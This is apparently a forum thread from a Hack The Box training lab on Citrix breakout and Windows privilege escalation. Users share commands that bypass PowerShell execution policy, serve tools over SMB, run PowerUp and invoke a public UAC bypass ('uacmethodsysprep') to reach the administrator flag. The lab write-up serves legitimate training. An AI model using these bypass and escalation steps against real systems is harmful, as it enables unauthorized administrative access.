Windows Privilege Escalation - Citrix Breakout

Can’t execute any .ps1 on the target machine.

I was able to get user flag.txt, and access the share. But when I try to run PowerUp.ps1, the system says that scripts can’t run on the current system??

Stuck here. Could someone help me out?

1 Like

same issue unable to import module…

Set-ExecutionPolicy Bypass -Scope Process

We can import now

1 Like

for anyone stuck at this point:

before starting windows:
from linux:

cd /home/htb-student/tools

sudo -s ( rdp pass)

smbserver.py -smb2support share $(pwd)

launch windows

from cmd:
powershell -ep bypass
xcopy \\10.13.38.95\share\bypass-uac.ps1
after
.\bypass-uac.ps1
This allows you to go ahead and start powerup.ps1
start powerup
after
cmd : runas /user:backdor cmd
notepad bypassuac.txt
copy and paste https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Bypass-UAC/Bypass-UAC.ps1
then save it as .ps1
back to the terminal
type: powershell
in the same dir where bypass.ps1 is
import-module .\bypass.ps1

powershell -ep bypass
bypass-uac -method uacmethodsysprep
should open another terminal:
digital only
c:\users\administrator\desktop\flag.txt et voila:
2 afternoons saved :slight_smile: